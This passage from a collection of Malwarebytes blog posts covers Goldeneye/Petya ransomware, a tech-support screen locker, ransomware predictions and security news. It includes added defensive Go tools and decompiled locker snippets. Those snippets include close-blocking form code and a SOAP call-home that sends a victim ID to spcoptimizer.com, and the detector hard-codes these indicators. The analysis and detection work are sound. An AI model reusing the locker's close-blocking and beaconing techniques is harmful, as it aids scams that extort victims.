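To make the scheme reconstructed from the decrypter concrete, here is a model of it in Go. This is an added example, not code from the post, from the malware, or from its decrypter: the 32-byte key is the first 32 bytes of SHA512 of the password, every file gets a fresh random IV, and the content is fed through AES-CBC in 1024-byte chunks. Two details are assumptions because the post does not state them: PKCS#7 padding (the .NET default for AES-CBC) and the IV being stored in front of the ciphertext. Running it shows the property noted earlier, that two identical plaintexts yield different ciphertexts, and that decryption under a wrong key fails at the padding check.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha512"
	"errors"
	"fmt"
	"io"
)

// chunkSize is the read size described in the post: 1024 bytes at a time.
const chunkSize = 1024

// deriveKey models the key derivation seen in the decrypter: the 32-byte AES
// key is the first 32 bytes of SHA512(password).
func deriveKey(password string) []byte {
	sum := sha512.Sum512([]byte(password))
	return sum[:32]
}

// pkcs7Pad pads data to a multiple of blockSize. Assumption: the post does not
// name the padding scheme; PKCS#7 is what .NET's AES-CBC uses by default.
func pkcs7Pad(data []byte, blockSize int) []byte {
	n := blockSize - len(data)%blockSize
	return append(append([]byte{}, data...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// pkcs7Unpad strips the padding and rejects malformed padding, which is the
// usual symptom of decrypting with the wrong key.
func pkcs7Unpad(data []byte, blockSize int) ([]byte, error) {
	if len(data) == 0 || len(data)%blockSize != 0 {
		return nil, errors.New("data is not block aligned")
	}
	n := int(data[len(data)-1])
	if n == 0 || n > blockSize {
		return nil, errors.New("bad padding length")
	}
	for _, b := range data[len(data)-n:] {
		if int(b) != n {
			return nil, errors.New("bad padding bytes")
		}
	}
	return data[:len(data)-n], nil
}

// encryptBlob encrypts one file's content with AES-256-CBC under a fresh random
// IV. Assumption: the IV is prepended to the ciphertext (the post only says it
// is stored in the file's content).
func encryptBlob(plain, key []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return nil, err
	}
	padded := pkcs7Pad(plain, aes.BlockSize)
	enc := cipher.NewCBCEncrypter(block, iv)
	out := append(make([]byte, 0, len(iv)+len(padded)), iv...)
	// Feed the data in 1024-byte chunks. The CBC chaining state carries across
	// chunk boundaries, so chunking does not change the ciphertext.
	for off := 0; off < len(padded); off += chunkSize {
		end := off + chunkSize
		if end > len(padded) {
			end = len(padded)
		}
		buf := make([]byte, end-off)
		enc.CryptBlocks(buf, padded[off:end])
		out = append(out, buf...)
	}
	return out, nil
}

// decryptBlob reverses encryptBlob. With a wrong key it fails on the padding
// check in all but the rare cases where garbage happens to look like padding.
func decryptBlob(blob, key []byte) ([]byte, error) {
	if len(blob) < 2*aes.BlockSize || len(blob)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext too short or not block aligned")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv, ct := blob[:aes.BlockSize], blob[aes.BlockSize:]
	plain := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(plain, ct)
	return pkcs7Unpad(plain, aes.BlockSize)
}

func main() {
	key := deriveKey("constructed-example-password")
	// Constructed sample content, about 1.3 KB so that it spans two chunks.
	plain := bytes.Repeat([]byte("constructed sample document text. "), 40)
	c1, _ := encryptBlob(plain, key)
	c2, _ := encryptBlob(plain, key)
	fmt.Println("same plaintext, different ciphertext:", !bytes.Equal(c1, c2))
	p, err := decryptBlob(c1, key)
	fmt.Println("round trip ok:", err == nil && bytes.Equal(p, plain))
}
```

The per-file IV is what makes two identical files come out different, as observed in the behavioural analysis; the key itself is the same for every file, so anyone holding the password can write a decrypter exactly like the one the author ships.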

The disk locker (former Petya)

This part of the Goldeneye ransomware is written at the beginning of the disk and is independent of the operating system. It is made up of a bootloader and a tiny 16-bit kernel. At first sight we can suspect that it is nothing more than a refactored Petya. That’s why, for simplicity, I will refer to this part as Petya Goldeneye.

Indeed, comparing the current edition with Petya 3 (described here) we can see that the encryption algorithm and the codebase haven’t changed. Yet, we can spot some differences.

Encryption

All versions of Petya use Salsa20 to encrypt the MFT. In the current edition, the implementation of Salsa20 is identical to the one in the former version.

See the BinDiff screenshot below – Petya Goldeneye vs Petya 3:

We can safely assume that, just like in the previous case, Salsa20 has been implemented correctly – which means this edition of Petya is not decryptable by external tools.

What has changed in the code?

Although the main parts of the code didn’t change, still we can notice that some refactoring has taken place:

The most important changes concern the way in which the encryption/decryption is applied. The author added more checks and simplified the decryption function. Still, the changes are about improving code quality rather than introducing new ideas.

Layout

Just like in the previous cases, Petya’s code is written at the beginning of the disk – however, now the layout is more compact. The code of Petya’s kernel starts just after MBR, without any padding. Due to this, other important sectors are also shifted. For example, the data sector, where the random salsa key is saved*, is now placed in sector 32:

* just like in all previous editions, this key is erased after use. Read more about the full procedure here.

Summing up, all the sectors are shifted towards the beginning of the disk.

Data sector:

  • Petya3: 54
  • Petya Goldeneye: 32

Verification sector:

  • Petya3: 55
  • Petya Goldeneye: 33

Original MBR (xored with 7)

  • Petya3: 56
  • Petya Goldeneye: 34
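
The shifted layout matters to anyone writing a recovery tool for the boot stage. The following Go program is an added example (not code from the post or from any published Petya tool): it reads a raw disk image, tries the original-MBR sector of each known edition (56 for Petya3, 34 for Goldeneye), undoes the XOR with 7 and checks for the 0x55AA boot signature before accepting the result. The disk image it builds for the demo is constructed test data, not a capture of a real infection.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
)

const sectorSize = 512

// petyaLayout records which sectors each Petya edition uses, as listed above.
type petyaLayout struct {
	Name         string
	DataSector   int // random Salsa20 key, erased after use
	VerifySector int
	MBRSector    int // original MBR, every byte XORed with 7
}

var knownLayouts = []petyaLayout{
	{Name: "Petya3", DataSector: 54, VerifySector: 55, MBRSector: 56},
	{Name: "Petya Goldeneye", DataSector: 32, VerifySector: 33, MBRSector: 34},
}

// readSector returns sector n of a raw disk image, or an error if the image is too small.
func readSector(image []byte, n int) ([]byte, error) {
	start := n * sectorSize
	if n < 0 || start+sectorSize > len(image) {
		return nil, fmt.Errorf("sector %d is outside the image", n)
	}
	return image[start : start+sectorSize], nil
}

// xor7 applies the XOR-with-7 transform. XOR is its own inverse, so the same
// function both encodes the backup copy and decodes it again.
func xor7(sector []byte) []byte {
	out := make([]byte, len(sector))
	for i, b := range sector {
		out[i] = b ^ 7
	}
	return out
}

// looksLikeMBR checks the 0x55AA boot signature that a real MBR ends with.
func looksLikeMBR(sector []byte) bool {
	return len(sector) == sectorSize && sector[510] == 0x55 && sector[511] == 0xAA
}

// recoverOriginalMBR tries each known layout and returns the first decoded
// sector that carries a valid boot signature, together with the layout matched.
func recoverOriginalMBR(image []byte) (petyaLayout, []byte, error) {
	for _, layout := range knownLayouts {
		sector, err := readSector(image, layout.MBRSector)
		if err != nil {
			continue
		}
		if mbr := xor7(sector); looksLikeMBR(mbr) {
			return layout, mbr, nil
		}
	}
	return petyaLayout{}, nil, errors.New("no XOR-7 encoded MBR found at a known sector")
}

// sampleMBR and buildSampleImage construct a tiny disk image for the demo.
// This is constructed test data: sector 0 is left empty where the real
// bootloader would sit, and only the backup MBR sector is populated.
func sampleMBR() []byte {
	mbr := make([]byte, sectorSize)
	copy(mbr, "constructed boot code placeholder")
	mbr[510], mbr[511] = 0x55, 0xAA
	return mbr
}

func buildSampleImage(layout petyaLayout, originalMBR []byte) []byte {
	image := make([]byte, (layout.MBRSector+1)*sectorSize)
	copy(image[layout.MBRSector*sectorSize:], xor7(originalMBR))
	return image
}

func main() {
	image := buildSampleImage(knownLayouts[1], sampleMBR())
	layout, mbr, err := recoverOriginalMBR(image)
	if err != nil {
		fmt.Println("recovery failed:", err)
		return
	}
	fmt.Printf("layout %s: recovered MBR matches sample: %v\n", layout.Name, bytes.Equal(mbr, sampleMBR()))
}
```

Putting the original MBR back only restores the boot code; the MFT encrypted with Salsa20 stays encrypted, and because the key in the data sector is erased after use, this step on its own does not bring the files back.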

Conclusion

Goldeneye ransomware is yet another step in the development of the Petya/Mischa bundle. The redesigned dropper couples both elements together in a new way that makes it even more dangerous. At the current stage the product doesn’t seem decryptable by external tools. We strongly advise being very vigilant about opening e-mail attachments, because this is still the main distribution method of this ransomware.

During the tests, Malwarebytes has proven to protect against the malicious payloads deployed by Goldeneye phishing e-mails:

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.


A closer look at a tech support screen locker

Malwarebytes - Wed, 12/14/2016 - 19:00

In this blog post, we are going to take a closer look at some of the code that the most prevalent family of tech support screen lockers is currently using to frustrate its victims. This family, dubbed VinCE after the Program folder it creates for itself, is compiled to Microsoft Intermediate Language (MSIL), which makes it easier to read for those of us who are not that versed in reverse engineering.

Background

This screen locker is designed to make the victims desperate enough to call the displayed number and ask for help. At that point, they are expected to pay a lot of money for minimal effort. Running the main executable (SBSCP.exe) on any Windows system results in a blue screen like the one shown below. The programmer’s goal is to frustrate attempts to get rid of the screen while, at the same time, giving the tech support scammers an easy way to dismiss it.

Don’t think that the blue screens are tailored to Windows versions. The fake BSOD above is displayed on any current Windows system, regardless of version. In fact, the screenshot above was taken on a Windows 7 machine.

The code

Let’s take a look at some code snippets. First, the ones that produce the content of the blue screen:

When you are first confronted with that blue screen, you can’t help but wonder what will happen when the completion percentage value reaches 100%. But looking at the code that controls this, full completion never happens. Because that’s all it is: a counter.

Random random = new Random();
this.intTotalCount = random.Next(25, 50);
this.intCount = 0;
this.growLabel1.Text = "Your PC ran into a problem and needs to restart. We're just collecting some error info, and then we'll restart for you.";
this.growLabel2.Text = this.intCount.ToString() + "% complete";
this.timer1.Interval = 500;
this.timer1.Enabled = true;

The most important thing we can learn from the above is that the percentage completion value shown in the screen locker stops somewhere between 25 and 50, most likely to egg the user on to call the phone number.

The rest of the text in the display, including the phone number, is put together in these lines of code:

text = "1-888-523-2979";
string str = "AAAAA";
this.growLabel3.Text = "For more information about this issue and possible fixes";
this.growLabel4.Text = "Call TOLL FREE \"" + text + "\" give them this info ";
this.growLabel5.Text = "Stop Code: CRITICAL_PROCESS_DIED";
this.growLabel6.Text = "Error Code : 0x000" + str;
this.blnFormUpdate = this.updateinstalls(text);

Now for a more interesting part: how do they keep users from closing the screen-lock forms and from shutting down the computer while these forms are active?

Actually, this is (probably) surprisingly easy. In the code below, Form1 is the lockscreen, and this bit—

private void Form1_FormClosing(object sender, FormClosingEventArgs e)
{
    if (!this.blnClose)
    {
        e.Cancel = true;
    }
}

—translates as: cancel any event that tries to close this form unless this.blnClose is TRUE. Seeing this sent me looking, because obviously I wanted to know when this statement would be true. I found that in the code shown below:

Taking out the relevant part for our quest gives us the code below. It shows us that if we use the F6 key, this.blnClose becomes true and the program closes. Mission accomplished.

private void Form1_KeyDown(object sender, KeyEventArgs e)
{
    if (e.KeyCode.ToString().ToLower() == "f6")
    {
        this.blnClose = true;
        base.Close();
    }
}

But there is one more thing I wanted to point out. As you can see from the code below, the program prepares a SOAP message to communicate a user ID and the displayed phone number back to a server, which happens to host a known PUP called SPC Optimizer.


string url = "http://spcoptimizer.com/servicenew/updateinstall.asmx";
string action = "http://tempuri.org/UpdateBRN";
strPhoneNumber += "_DOSB_8";
XmlDocument soapEnvelopeXml = Form1.CreateSoapEnvelope(strId, strPhoneNumber);
HttpWebRequest httpWebRequest = Form1.CreateWebRequest(url, action);
Form1.InsertSoapEnvelopeIntoWebRequest(soapEnvelopeXml, httpWebRequest);
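Because the call-home uses a fixed host, path and action string, it can be spotted in web proxy logs. The following Go program is an added example (not the locker’s code and not Malwarebytes’ code): it parses a few constructed proxy log lines and flags the request assembled in the snippet above. The log format is an assumption (a simple space-separated layout; adapt the parser to your proxy), the indicator values are the ones visible in the decompiled snippet, and the example assumes the action string is sent as a SOAPAction header, the usual way a .NET SOAP client transmits it.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Indicators taken from the decompiled snippet above.
const (
	beaconHost   = "spcoptimizer.com"
	beaconPath   = "/servicenew/updateinstall.asmx"
	beaconAction = "http://tempuri.org/UpdateBRN"
)

// proxyRecord is the subset of fields this check needs from a proxy log line.
type proxyRecord struct {
	Timestamp, Client, Method, URL, SOAPAction string
}

// parseProxyLine parses one line of the constructed log format:
//   <timestamp> <client> <method> <url> [soapaction=<value>]
// Assumption: real proxies have their own formats; only this parser changes.
func parseProxyLine(line string) (proxyRecord, bool) {
	f := strings.Fields(line)
	if len(f) < 4 {
		return proxyRecord{}, false
	}
	rec := proxyRecord{Timestamp: f[0], Client: f[1], Method: f[2], URL: f[3]}
	for _, kv := range f[4:] {
		if strings.HasPrefix(strings.ToLower(kv), "soapaction=") {
			rec.SOAPAction = strings.Trim(kv[len("soapaction="):], "\"")
		}
	}
	return rec, true
}

// matchBeacon returns the reasons a record looks like the locker's SOAP
// call-home; an empty result means no match. Host, path and action are
// checked separately so a partial match (e.g. a plain visit to the domain)
// is still surfaced with a weaker reason.
func matchBeacon(rec proxyRecord) []string {
	var reasons []string
	u, err := url.Parse(rec.URL)
	if err != nil {
		return nil
	}
	host := strings.ToLower(u.Hostname())
	if host == beaconHost || strings.HasSuffix(host, "."+beaconHost) {
		reasons = append(reasons, "host matches "+beaconHost)
		if strings.EqualFold(u.Path, beaconPath) && strings.EqualFold(rec.Method, "POST") {
			reasons = append(reasons, "POST to "+beaconPath)
		}
	}
	if rec.SOAPAction == beaconAction {
		reasons = append(reasons, "SOAPAction "+beaconAction)
	}
	return reasons
}

// scanProxyLog runs the check over a whole log and returns the matching
// records (keyed by client and timestamp) with their reasons.
func scanProxyLog(log string) map[string][]string {
	hits := map[string][]string{}
	for _, line := range strings.Split(log, "\n") {
		rec, ok := parseProxyLine(strings.TrimSpace(line))
		if !ok {
			continue
		}
		if reasons := matchBeacon(rec); len(reasons) > 0 {
			hits[rec.Client+" "+rec.Timestamp] = reasons
		}
	}
	return hits
}

// sampleLog is constructed test data, not a real capture.
const sampleLog = `
2016-12-14T10:01:02Z 10.0.0.5 GET http://www.example.com/index.html
2016-12-14T10:01:09Z 10.0.0.5 POST http://spcoptimizer.com/servicenew/updateinstall.asmx soapaction="http://tempuri.org/UpdateBRN"
2016-12-14T10:02:30Z 10.0.0.7 GET http://spcoptimizer.com/
2016-12-14T10:03:11Z 10.0.0.9 POST http://updates.example.net/api/report
`

func main() {
	for key, reasons := range scanProxyLog(sampleLog) {
		fmt.Println(key, "->", strings.Join(reasons, "; "))
	}
}
```

In the sample the full beacon from 10.0.0.5 trips all three indicators, while the plain visit from 10.0.0.7 only matches the host; a domain match alone is worth an alert here because, as noted above, the same server hosts a known PUP.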

Summary

As a demonstration of how tech support scammers operate and try to lure victims into calling their number, we have shown you some snippets of the code.

We especially highlighted the pieces of code that show the easy way out the tech support scammers created for themselves to get rid of the lock screen, and that hint at who may be the actors behind the malware.

File details

SBSCP.exe – SHA256 1e4fd5500eaf819e8b8e949634a38fccc8159668b205165a565e2530b2870cfc

A full removal guide for this Tech Support Scam can be found on our forums.

Malwarebytes detected the executable as Trojan.TechSupportScam.

Note that there is at least one slightly different variant of this one, displaying another phone number (see header of this post).

The Web Protection module included in the Premium version of Malwarebytes blocked the contacted domain, as you can see from the screenshot below:

As always: Save yourself the hassle and get protected.

Pieter Arntz


Security in 2017: Ransomware will remain king

Malwarebytes - Wed, 12/14/2016 - 17:00

2016 was the year of ransomware, with hackers focusing their attention on exploiting Internet users and businesses around the world for profit. According to the FBI, cyberextortion losses have skyrocketed and ransomware was on track to become a $1 billion a year crime in 2016.

Our research shows no sign of this security nightmare slowing down in 2017. Hackers are becoming more advanced, and ransomware remains an incredibly easy, lucrative way for them to make money. Unfortunately, the security community has only started to develop defenses that can protect Internet users from ransomware.

With the new year around the corner, security researchers at Malwarebytes Labs have compiled a list of predictions that encompass what new ransomware threats, developments, and opportunities they expect consumers and businesses will face in 2017.

Ransomware will become personal.

Most ransomware attacks today are indiscriminate. For the most part, cyber criminals issue ransomware at random, hitting anyone and everyone that they can. However, it’s increasingly likely that targeted ransomware attacks will become the new norm. If an attacker can recognize the difference between an enterprise and a consumer target, they will be able to adapt their ransom demands to match their victims. The intentions of attacks are also likely to become more personal. In addition to encrypting files, ransomware attackers will soon be threatening to post data or information on social media, or to expose it in an equally destructive way. As with most cyber attacks, ransomware will grow to take advantage of more human vulnerabilities.

Ransomware protection will become an investment.

Until this past year, companies and consumers had few solutions available to them to help detect and fight ransomware. Security researchers have been working hard to find decryptors for specific ransomware types so that they can effectively protect against them in the near future. However, when a ransomware decryptor is released, ransomware authors often tweak their attacks to avoid detection. As this cat and mouse game between security researchers and ransomware creators continues, more security vendors will debut anti-ransomware protection offerings. In fact, we predict that by the end of 2017 at least 50% of security companies will release some sort of ransomware detection and/or prevention software. Companies and consumers will both find themselves investing in new anti-ransomware security software in 2017.

Password managers will become a huge target.

In 2017, password managers, digital vaults where users store passwords and other authentication data, will become a huge target for cybercriminals. In fact, just last month, it was revealed that Apple’s new iOS 10 operating system has a potential security hole that could help hackers get access to passwords and other sensitive information. Hackers are apparently able to infiltrate Apple’s Keychain password manager. For a hacker, breaking into a network such as this can be incredibly fruitful. The top password managers are likely to find themselves under attack in 2017.

Attackers will pickpocket the digital wallet.

With the growth of financial and budget planning applications; increased pervasiveness of new payment methodologies such as Apple Pay adding new wrinkles (such as making online payments through the phone); and the growing pervasiveness of cryptocurrencies (like Bitcoin, Litecoin, and Peercoin), there will be increasing attacks against applications, plugins, digital wallets, and the companies holding authentication data allowing access to these digital currency streams. With the incremental adoption of each of these technologies, the potential windfall from a dedicated attacker increases. Soon it will be more than enough to attract organized criminals who previously flocked to the banking Trojans of the past. In fact, the first attacks may evolve from the original Zeus source code, the granddaddy of banking Trojans.

A new exploit kit will emerge as the top dog.

In recent months, we have witnessed several trends that hint that existing malware attacks are going “back to the basics.” For example, there has been a rise in the spread of malware attacks through email and phishing, while more sophisticated malvertising and exploit kit attacks have decreased. Companies and consumers have figured out how to block Java and Flash and are moving to HTML5, making it harder for the existing exploit kits to succeed in deploying malware through malvertising.

Since Angler EK disappeared in June 2016, several other exploit kits have been battling for the top spot. An underdog, RIG EK is now positioned to be the new leader, but it still relies on older vulnerabilities, all of which are easily prevented today. This opens up a massive opportunity for a new, sophisticated and dangerous exploit kit to emerge in the next year.

Malware will become ingrained in tech support scams, and attacks will increase globally.

Tech support scams (TSS) have become incredibly advanced and dangerous over the last few years and most recently we have witnessed TSS deploying malware, and even extortionware. In 2017, TSS attackers will dive into this benefit headfirst and leverage the malware threat landscape more than ever before.

The IoT will thrust DDoS attacks into a new era.

In 2017, the Internet of Things (IoT) will perpetuate an evolution in how DDoS attacks are orchestrated. In September of 2016, we saw a DDoS attack like never before. Security blogger Brian Krebs found himself under the biggest DDoS attack ever recorded, and sources emphasized that CCTV cameras wired to the Internet and other unsecured connected devices were leveraged by attackers to orchestrate the attack. Based on the sheer volume of devices that we have connected to the Internet today, the very real challenge of not being able to update or secure their firmware, and the ease with which these devices can be identified using either general (Google) or specialized (Shodan) search, the possibilities for DDoS attackers have exploded. We anticipate that we will see increasing attacks like the one that targeted Krebs, perhaps even targeting critical infrastructure such as the power grid or government communications.

Security will be the #1 priority for the boardroom.

In 2017, we anticipate that more security professionals will be asked to join company boards. The need to have someone technical with a background in security on your board is currently at an incredibly high premium—across all industries. This will only continue to grow over the next year, as we continue to watch it evolve into one of the top business and political priorities of our age.


Ransomware tries its hand at being a deadly viral meme

Malwarebytes - Tue, 12/13/2016 - 17:06

Memes are weird things and weren’t always about lolcats or frogs or whatever the latest terrible image macro doing the rounds happens to be. I quite like this line from Wikipedia on said subject:

Proponents theorise that memes are a viral phenomenon that may evolve by natural selection…Memes that propagate less prolifically may become extinct, while others may survive, spread, and (for better or for worse) mutate.

The plot of The Ring is pretty much the concept of a meme made deadly – pass on this cursed videotape within 7 days, or you die horribly.

How far will you go to save yourself?

Well, our old friend 2016 is here to ask that question one more time, because ransomware authors have decided to tweak their victims’ get-out-of-jail method. Don’t have the funds to obtain an unlock key? No problem – just infect two people and you’re back in business (assuming they pay up to unlock their own files). It’s all gone a bit pyramid scheme, hasn’t it?

Interestingly, the time limit to regain your files is the same as the time limit imposed on potential victims of Sadako: seven days.

The only way that could be creepier is if they’d released this during Halloween.

Named after the well known BitTorrent client Popcorn Time, this file goes one step further than most in a mission to make some money. It encrypts files in the usual places – Documents, Music, Pictures and Desktop – and targets pretty much every file extension under the sun. After encryption, the splash screen explaining what’s happened claims the creators are from Syria and that money generated from the ransomware will be used for “food, medicine, and shelter”.

At this point, the choices available boil down to randomly entering a key to unlock the files (not a good idea, as there is mention in the source code that incorrect key entry may eventually result in automatic file deletion), or to play the game and begin the process of infecting other people, in the hopes of obtaining an unlock key.

Note that it isn’t enough to infect another person – you have to hope they pay the ransom too, or they don’t count as a notch on your tally of victims.

All of this only works on the assumption that the ransomware authors will actually provide an unlock key and that is certainly up for debate. It’s also probable that victims won’t want to risk friendships so they’ll end up trolling for random victims in chat rooms, social media and other fish in a barrel locations. In other words, like common or garden script kiddies going about their daily business.

What a mess!

As Graham Cluley mentions, you don’t want to risk getting into trouble with the law because you decided to save yourself by torching the data of others. Should you fall victim to a piece of ransomware, don’t give up hope – many of these files are poorly coded and in many cases, members of the security community, independent researchers, security firms, and more besides manage to come up with decryption tools.

Meanwhile, users of Malwarebytes 3.0 will find we detect this as Ransom.FileCryptor.

Christopher Boyd


A week in security (Dec 04 – Dec 10)

Malwarebytes - Mon, 12/12/2016 - 23:29

Last week we launched Malwarebytes 3.0, our next-generation antivirus replacement.

We also touched on domain generating algorithms (DGA), went up-close and personal with a rootkit, and featured a fake “smart drug” news story.

Lead Malware Intelligence Analyst Jérôme Segura reported on another malvertising campaign, attributed to the group identified as AdGholas.

Below are notable news stories and security-related happenings:

  • Disttrack Wiper Malware Hits Saudi Arabia’s Aviation Agency. “Shamoon attackers with their Disttrack wiper malware have hit Saudi Arabian entities again. The Saudi government confirmed the latest breaches on Thursday, and for now the identity of only one target has been revealed: the country’s General Authority of Civil Aviation (GACA), which is the national institution in charge of aviation and related matters, as well as the operator of four international and 23 domestic airports within the country.” (Source: Help Net Security)
  • Exploit Company Exodus Sold Firefox Zero-Day Earlier This Year. “This week, an exploit was publicly distributed that could break into the computers of those using the Tor Browser or Firefox. The Tor Project and Mozilla patched the underlying vulnerability on Wednesday. One research company gave details of the exploit method used to a defensive cybersecurity firm last year so it could protect its own clients’ systems. In turn, the exploit research company went on to sell details of the recent Firefox vulnerability to another customer for offensive purposes this year, according to two sources.” (Source: Vice’s Motherboard)
  • Ransomware As A Service Fuels Explosive Growth. “Believe it – you too can become a successful cyber criminal! It’s easy! It’s cheap! It’s short hours for big bucks! No need to spend years on boring things like learning how to write code or develop software. Just download our simple ransomware toolkit and we can have you up and running in hours – stealing hundreds or thousands of dollars from people in other countries, all from the comfort of your home office – or your parents’ basement. Sit back and watch the Bitcoin roll in!” (Source: CSO)
  • Researchers Warn Of Visa Payment Fraud Gaps. “Researchers have warned that deficiencies in Visa’s e-commerce payment network could allow attackers to brute force credit card details in as little as six seconds. A paper from Newcastle University’s Mohammed Aamir Ali, Budi Arief, Martin Emms and Aad van Moorsel describes how they were able to launch a “distributed guessing attack” against Alexa top-400 online merchants’ payment sites to work out expiry dates and CV2 values.” (Source: InfoSecurity Magazine)
  • The Flowering Of Voice Control Leads To A Crop Of Security Holes. “‘Tis the season of cybersecurity threat predictions for 2017. Vendors’ glossy reports shower onto the desks of customers and journalists like gentle Christmas snow. But so many of these reports, like so many snowfalls, are nothing but slush. All year we’ve been hearing about the spreading plague of ransomware, and how the Internet of Things (IoT) will be a security nightmare. Remember the botnet made of video cameras? Vendors have been waving around phrases like ‘artificial intelligence’ and ‘machine learning’ and ‘threat intelligence sharing’ like magic wands.” (Source: ZDNet)
  • Facebook, Microsoft, Twitter And YouTube Team To ID Terror Content. “Facebook, Microsoft, Twitter and YouTube have teamed up to share their expertise spotting terrorism-related content, in order to crimp its spread. The four put their name to a joint statement in which they declare ‘There is no place for content that promotes terrorism on our hosted consumer services.'” (Source: The Register)
  • Reality Check: Getting Serious About IoT Security. “In an effort to curtail a new and disturbing cyberattack trend, the Department of Homeland Security has placed Internet of Things (IoT) device manufacturers on notice. The recent proclamation clarified how serious the agency is about the issue and how serious it wants corporate decision makers to be. In short, the DHS “Strategic Principles for Securing the Internet of Things” acknowledges the gravity of the current climate and the potential for greater harm by encouraging security to be implemented during the design phase, complete with ongoing updates based on industry best practices.” (Source: Dark Reading)
  • Verizon: Unknown Assets A Hacker’s Playground. “Service Provider & Enterprise Security Strategies — Merger and acquisition activity may be financially rewarding but it can actually create and contribute to enterprise security risks, Verizon Enterprise Solutions’ Christopher Novak warned today. The Risk Team director said many data breaches, including some that last for months, have targeted assets that are networked but not covered by company security solutions, often because the corporation is unaware of their existence.” (Source: Light Reading)
  • What Role Does Privacy Play In Your Digital Transformation Strategy? “If you are a senior leader in an organisation, I am sure you have been asked the question – ‘What is your digital strategy?’ You may also be getting tired of people telling you that new market entrants (especially millennials) are disrupting traditional business models and are forcing you to redefine the end to end customer experience. And here is another good one -‘Have you hired a digital transformation executive yet?’ While I make light of all the digital hype, this transformation is not a joke – it is a survival necessity.” (Source: IT Security Guru)
  • Call For Privacy Probes Over Cayla Doll And i-Que Toys. “The makers of the i-Que and Cayla smart toys have been accused of subjecting children to ‘ongoing surveillance’ and posing an ‘imminent and immediate threat’ to their safety and security. The accusations come via a formal complaint in the US by consumer groups. They, along with several EU bodies, are calling for investigations into the manufacturers.” (Source: The BBC)
  • Hackers Launch Stealth Malvertising Campaign Exposing Millions Online To Spyware And More. “Millions of internet users visiting popular news sites over the past few months may have been exposed to a malicious malvertising campaign. The cybercriminals behind the campaign are distributing malicious ads, which redirect users to the Stegano exploit kit. Security researchers uncovered that the Stegano malvertising campaign, exploited several Flash vulnerabilities. The malicious ads came embedded with attack codes within individual image pixels. Stegano has been active since 2014, however, researchers noted a fresh campaign launched in October, which operates in an exceedingly stealthy manner to infect victims.” (Source: The International Business Times)
  • Hackers Get Easy Route To Patient Data. “Patients are being put at risk because most NHS trusts are using an obsolete IT operating system that no longer receives security updates, researchers have warned. The trusts’ use of the old Windows XP system could enable hackers to steal patient data or take control of hospital infrastructure. Criminals have already used cyberattacks to hold hospitals to ransom and an NHS trust in Lincolnshire and East Yorkshire said this week that an attack in October led to the cancellation of more than 2,800 patient appointments, including operations.” (Source: The Times)
  • TAG Awards First Group Of ‘Certified Against Fraud’ Seals To Companies Meeting Strict Anti-Fraud Standards. “The Trustworthy Accountability Group (TAG), an advertising industry initiative to fight criminal activity in the digital advertising supply chain, today announced the initial group of companies to complete the review process and be awarded the TAG ‘Certified Against Fraud’ Seal, showing they have met TAG’s rigorous anti-fraud standards. The initial recipients of the TAG ‘Certified Against Fraud’ Seal include Amobee; comScore; DoubleVerify; Dstillery; Google; WPP’s GroupM; Horizon Media; Integral Ad Science; Interpublic Group; Moat; Omnicom Media Group; OpenX Technologies, Inc.; ProData Media; Rocket Fuel Inc.; Sovrn; and White Ops, Inc.” (Source: Street Insider)
  • The Security Gift Guide. “Even more than most IT professionals, security professionals are asked for advice on a regular basis. We are supposed to know not just about computers in general, but how people can protect themselves both online and in the real world. Whether it is getting a printer working, or if it is safe to shop online, we are expected to have the answers. At the same time, shopping for gifts can be problematic. You’re never sure what people have. Some people provide gift lists, which are great. But in the absence of a specific request, you might as well give people something useful that might make things easier for you. This guide can be useful even if you are not a security professional. Also remember that security is not just about stopping hackers, but about providing confidentiality, integrity, and availability in all forms.” (Source: CSO)
  • Corporate Data Left Unprotected In The Wild. “A new survey conducted by YouGov has highlighted the risks to corporate data from poor encryption, and employee use of unauthorised and inadequately protected devices. The survey of British office workers found that 42% use devices not provided by their employer to work with corporate e-mails and files. Half (52%) also use personal online accounts, such as Enterprise File Sharing Services (EFSS) to store or access work files – with only 34% saying they have never done so.” (Source: Help Net Security)
  • Small Businesses Underestimate The Cyber Threats Of Irresponsible Employee Actions. “Small companies (up to 50 employees) are significantly less concerned about employee activities leading to cybersecurity breaches than larger corporations. Only 36 per cent of small businesses worry about their staff’s carelessness while more than half of medium-sized and large enterprises consider it a major concern, says IT Security Risks Report 2016 by Kaspersky Lab. Uninformed or careless staff, whose inappropriate use of IT resources can put an organization’s cyberprotection in jeopardy, can harm businesses of any size. According to the survey, employee actions are among top three security challenges that make companies worldwide feel vulnerable. More than half (61 per cent) of the businesses experiencing cybersecurity incidents in 2016 admitted that careless and uninformed employee behavior has been a contributor.” (Source: Deccan Chronicle)
  • App Developers Not Ready For iOS Transport Security Requirements. “A month before Apple is expected to enforce stricter security requirements for app communications in iOS, enterprise developers don’t seem ready to embrace them, a new study shows. The study was performed by security firm Appthority on the most common 200 apps installed on iOS devices in enterprise environments. The researchers looked at how well these apps conform to Apple’s App Transport Security (ATS) requirements.” (Source: CSO)
  • Dailymotion Urges Users To Reset Passwords In Wake Of Possible Breach. “Breach notification service LeakedSource has added information about over 87 million Dailymotion users to its search index. The information includes 87+ million email addresses, user IDs, and over 18 million associated passwords. It was apparently stolen in a breach that happened around October 20, 2016. The passwords have been put through the bcrypt hashing algorithm, so they can’t be easily cracked. LeakedSource said they won’t attempt to crack them, but told Bleeping Computer that ‘a determined hacker who wants to crack one person’s hash may still be able to.'” (Source: Help Net Security)
  • Standards Body Warned SMS 2FA Is Insecure And Nobody Listened. “The US National Institute of Standards and Technology’s (NIST) advice that SMS is a poor way to deliver two factor authentication is having little impact, according to Duo Security. Last July NIST declared that sending one-time passwords to mobile phones was insecure. The organisation wrote in its advisory that the likelihood of interception makes TXT unreliable.” (Source: The Register)
